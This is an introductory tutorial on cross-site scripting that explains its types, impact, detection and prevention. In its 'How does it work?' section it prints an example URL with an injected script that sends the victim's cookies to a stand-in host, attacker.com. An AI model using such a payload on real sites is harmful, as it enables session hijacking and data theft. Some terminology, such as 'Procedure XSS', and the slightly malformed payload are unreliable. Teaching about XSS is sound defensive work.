Introduction to Cross-Site Scripting
Cross-Site Scripting is an attack on the web security of the user, the main motive of the attacker is to steal the data of the user by running a malicious script in the browser that is injected in the website content which is used by the user, as a result of this attack, the attacker gains full control of the victim’s browser which he can use to browse and send the worm to the user computer, this attack is classified into two categories, i.e. Stored XSS attack and Procedure XSS attack.
Different types of Cross-Site Scripting (XSS)
Although there is no particular classification of Cross-Site Scripting, some experts have classified it into two types which are discussed below in detail:
Stored XSS attacks
- Stored XSS are those in which the malicious script injected by the attacker gets stored in the database and runs on the browser of the user when he tries to access the database in some form. These are also known as Persistent or stored XSS. This is one of the most devastating attacks and happens especially when the website/ web page allows commenting or allows the embedding of HTML content.
- When the buyer opens the product description to view the details of the product, it will become the victim as the script executes in its web browser, and all the details of the user that the browser allows will get hijacked.
Procedure XSS attacks
- For Example, in an e-commerce website, there is a search box in which a user can search the items and the string written in the search box is visible in the URL of the website when the search request is sent to the server.
- The attacker creates a link in which the malicious script is concatenated in the URL and sent it to the victim via email. When the victim opens that link, then the request is sent to the attacker’s malicious website, and all the browser data of the victim is hijacked and sent to the system of the attacker.
How does it work?
- In Cross-Site Scripting (XSS) vulnerability, the attacker’s main motive is to steal the user’s data by running the malicious script in its browser, which is injected into the website content which the user is using through different means.
- For Example, when a user searches for some text on a website, then the request is sent to the server in the form:
In the search result, the website returns the result along with what the user searched for, like:
|You searched for text1.|
If the search functionality is vulnerable to XSS, then the attacker can add the malicious script in the URL :
|https://www.abcwebsite.com/search=<script> document location=https://attacker.com/log.php?c=’ +encodeURIComponent(document.cookie)</script>|
- When the victim clicks on this link, it redirects to the malicious website, i.e. https://attacker.com and all the browser data is directly sent to the attacker’s computer resulting in the attacker stealing all the session token/cookies.
- In this way, an attacker injects its malicious script in the URL; the Attacker can also store that script in the server, which comes under Stored XSS.
Impact of Cross-Site Scripting Vulnerabilities
The impact of Cross-Site Scripting varies a lot. After exploiting the XSS vulnerability, an attacker gains full control of the victim’s browser and can perform different actions that vary from small ones like viewing the browser history to disastrous ones like inserting worms in the computer.
Some of the actions which the attacker can perform by exploiting the XSS vulnerability are as follows:-
- Leaking sensitive information like username and password.
- Inserting worms on the computer.
- Redirecting the user to some dangerous website and forcing them to perform some actions
- Access the browsing history of the victim.
- Installation of Trojan horse program.
- Force the user to perform and modify the values in the application by gaining access over
Finding Cross-Site Scripting Vulnerabilities
- XSS vulnerabilities occur for two reasons: either the user’s input is not validated before sending it to the server, or the output received to the browser is not HTML encoded. Keeping in mind the disastrous impact of XSS vulnerability and protecting users’ privacy, it is essential to find whether the web application is vulnerable to XSS.
- Although XSS is difficult to identify and remove, the best way to check is to perform the code’s security review and check for all the places where the input from the HTTP request can make its way to display as Output in an application. Using the automatic vulnerability scanner tools, which include a specialized XSS scanner module to scan the whole web application, can also help in scanning and finding the vulnerabilities in an application.
How to Prevent XSS?
- XSS is a code injection vulnerability, so it is essential to encode the data sent to the server and the data that comes from the server to the browser of a user.
- Data Validation is also very important so that the browser interprets the code without any malicious commands. Different prevention methods were introduced, keeping the data Validation and Encoding as a priority for a website to be vulnerable to XSS.
Some points need to be focussed on preventing XSS:
- HTTP Trace support on all the web servers should be turned off as the attacker can steal the cookie and private browser data through an HTTP trace call from the server even if the document.cookie is disabled in the victim’s browser.
- Developers should sanitize the input and should never output the data directly received from the user without validating it.
XSS attacks are dangerous and can harm the user’s privacy and steal the data unless the normal user browses the application carefully. While developing the application, developers should follow strict security rules, especially for both data and server, so that the application is least vulnerable to XSS, and more users can rely on it.
This has been a guide to What is Cross-Site Scripting?. Here we discuss the different types of cross-site, working, impact, and prevention of XSS respectively. You can also go through our other suggested articles to learn more –